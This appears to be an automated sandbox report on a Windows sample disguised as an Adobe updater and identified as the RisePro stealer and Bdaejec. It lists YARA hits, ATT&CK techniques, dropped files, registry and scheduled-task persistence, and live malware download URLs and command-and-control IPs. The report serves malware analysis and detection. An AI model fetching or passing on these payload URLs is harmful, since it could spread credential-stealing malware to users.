Source: Yara match	File source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AdobeUpdaterV131.exe PID: 6616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 8104, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Native API	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	13 Software Packing	Security Account Manager	215 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	24 Virtualization/Sandbox Evasion	Cached Domain Credentials	24 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AdobeUpdaterV131.exe	100%	Avira	W32/Jadtre.B
AdobeUpdaterV131.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\xRp.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\xRp.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://www.winimage.com/zLibDll	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	Avira URL Cloud	phishing
https://t.me/RiseProSUPPORTFs	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rars	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarUa	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar8	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rarsC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarcC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.raryY	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m	100%	Avira URL Cloud	malware
https://t.me/RiseProSUPPORTF/	0%	Avira URL Cloud	safe
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar7	100%	Avira URL Cloud	phishing
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rar?Y	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/v	100%	Avira URL Cloud	malware
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k4.rar)X	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarcag$	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar1b	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarq	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarU	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rars	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarsC:	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarhg	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rar	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarMp	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k5.rarC:	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rarUa	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://t.me/RiseProSUPPORTFs	MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rars	xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarC:	xRp.exe, 00000001.00000002.1856041634.000000000087D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar8	xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarsC:	xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarcC:	xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.raryY	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarXY$$m	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://t.me/RiseProSUPPORTF/	RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar?Y	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar7	xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	xRp.exe, 00000001.00000003.1658769932.0000000000520000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmp, xRp.exe, 0000000F.00000003.1890235266.0000000000B60000.00000004.00001000.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll	AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/v	xRp.exe, 00000001.00000002.1856041634.000000000090E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORT	AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar)X	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcag$	xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarq	xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar1b	xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarFSXY$$m	xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rars	xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarsC:	xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net/	xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarU	xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarS	xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://ddos.dnsnb8.net:799/cj//k1.rarhg	xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarMp	xRp.exe, 00000001.00000002.1857202345.00000000022EA000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.winimage.com/zLibDll	AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarC:	xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
193.233.132.62	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480703
Start date and time:	2024-07-24 23:01:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AdobeUpdaterV131.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@27/29@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: AdobeUpdaterV131.exe

Simulations

Behavior and APIs

Time	Type	Description
17:02:12	API Interceptor	1x Sleep call for process: WerFault.exe modified
17:02:24	API Interceptor	3078580x Sleep call for process: AdobeUpdaterV131.exe modified
17:02:31	API Interceptor	5532x Sleep call for process: MPGPH131.exe modified
17:02:38	API Interceptor	4377186x Sleep call for process: RageMP131.exe modified
22:01:59	Task Scheduler	Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
22:01:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
22:02:00	Task Scheduler	Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
22:02:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	AIBIJIAO 12.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	7Y18r(224).exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k4.rar
	A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
193.233.132.62	SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	9iz0QM9rMM.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	4fMLTRkOfB.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	q7a5JOlhLZ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	7jv1U7CgKF.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	AIBIJIAO 12.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	aac8519abeba00e182d4447ac6ccabd3887f0900c6d9ee86ba76326beb673b16.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	ab6712bb5295b323b59cc12c08375b22667a0d0fe8d724750c3d98f9d92e7280.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(224).exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	A61D991D01857B94696C896E5F0A9B5A5537D7F7BDFA342551F88FC6C865D3AD.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	A6B1DC8EA546B26E5A6F2D13DE10E4C20D6CE9774348E5BD75388E91DE689AC1.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	A63B9C4ED6D83AFF1BF47215F3297D5FB1CD85E69A24DEAC6750D511F61DE055.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	AF94EC40248120D040629B0B921538DB88886FB9534A7A167D06D2B6EF5DA784.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	AIBIJIAO 12.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	ACACF499B033BA6707F458366D563E7682E8E856A313EF8446C7CCEC41AD3F82.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	AB3BFACF38D1544DCEACFE2ECD4DC8501182979913ADBC56402E874E6D53A315.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
